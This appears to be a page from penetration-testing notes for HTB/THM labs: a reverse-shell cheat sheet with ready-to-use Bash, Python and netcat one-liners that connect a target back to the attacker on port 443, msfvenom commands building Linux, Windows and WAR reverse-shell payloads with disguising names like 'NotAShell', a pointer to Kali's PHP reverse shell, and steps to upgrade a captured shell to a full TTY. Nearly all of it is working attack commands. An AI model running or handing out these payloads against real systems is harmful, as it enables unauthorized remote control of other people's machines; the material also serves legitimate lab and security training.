Reverse Shell

Caveats

Port choice
- Use any open port from nmap scan.
- For HTB/THM, you can assume port 443 works for reverse shell.
Staged vs. non-staged payloads
- Try staged payloads first.
- If it does not work, try non-staged payloads.

PHP Reverse Shell

Kali linux comes with this built-in PHP reverse shell:

/usr/share/webshells/php/php-reverse-shell.php

Change $ip and $port before using it:

For convenience, edit ~/.zshrc (or ~/.bashrc) and create an alias for copying this payload to current working directory:

alias php-reverse-shell="cp /usr/share/webshells/php/php-reverse-shell.php ."

One-Liners

Bash

bash -i >& /dev/tcp/<local_ip>/443 0>&1

Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Netcat

nc -e /bin/sh <local_ip> 443

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <local_ip> 443 >/tmp/f

Msfvenom

Linux

msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f elf > NotAShell.elf

Windows

msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe > NotAShell.exe

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=443 -f war > NotAShell.war

Fully Interactive TTY Shell

Step 1 is sufficient in most scenarios. If you plan to use things like Vim for privesc, then you need to complete all steps.

Step 1: upgrade to TTY shell

In the remote shell, upgrade the shell to TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: export terminal environmental variables

In your local shell, check the environmental variable $TERM:

$ echo $TERM
xterm-256color

In the remote shell, export the environmental variables $TERM and $SHELL:

export TERM=xterm-256color
export SHELL=/bin/bash

Step 3: set up terminal size

In your local shell, check terminal rows and columns:

$ stty size
36 145

In the remote shell, press ctrl+z to bring the current session to background:

^Z
[1]+  Stopped        nc -nlvp 443

Now you are brought back to the local shell. Bring the reverse shell to foreground:

$ stty raw -echo;fg
nc -nlvp 443
$                reset

Adjust the terminal size:

$ stty rows 36 columns 145

Reference

PreviousPHP Webshells NextTTY

Last updated 3 years ago

hashtagCaveats

hashtagPHP Reverse Shell

hashtagOne-Liners

hashtagBash

hashtagPython

hashtagNetcat

hashtagMsfvenom

hashtagLinux

hashtagWindows

hashtagWAR

hashtagFully Interactive TTY Shell

hashtagStep 1: upgrade to TTY shell

hashtagStep 2: export terminal environmental variables

hashtagStep 3: set up terminal size

hashtagReference